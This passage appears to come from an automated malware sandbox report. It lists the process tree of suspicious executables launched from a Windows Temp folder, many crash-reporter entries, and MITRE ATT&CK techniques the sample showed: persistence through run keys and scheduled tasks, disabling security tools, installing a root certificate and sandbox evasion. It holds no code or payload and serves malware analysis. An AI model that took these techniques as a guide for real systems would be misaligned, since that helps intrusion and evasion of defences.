C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F989.exe"C:\Users\Admin\AppData\Local\Temp\F989.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\FE3D.exeC:\Users\Admin\AppData\Local\Temp\FE3D.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\FE3D.exeC:\Users\Admin\AppData\Local\Temp\FE3D.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 8682⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3188 -ip 31881⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2712 -ip 27121⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6868 -ip 68681⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 6736 -ip 67361⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 456 -ip 4561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1104 -ip 11041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 436 -ip 4361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6044 -ip 60441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6688 -ip 66881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 7680 -ip 76801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5904 -ip 59041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5660 -ip 56601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6892 -ip 68921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 7748 -ip 77481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3332 -ip 33321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6420 -ip 64201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7492 -ip 74921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 8512 -ip 85121⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
188KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
828KB
-
Filesize
444KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
6.1MB
-
Filesize
9.3MB
-
Filesize
36KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
628KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
828KB
-
Filesize
440KB
-
Filesize
5.6MB
-
Filesize
1.2MB
-
Filesize
192KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
2.5MB
-
Filesize
436KB
-
Filesize
12KB
-
Filesize
8KB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
588KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
628KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
296KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
8KB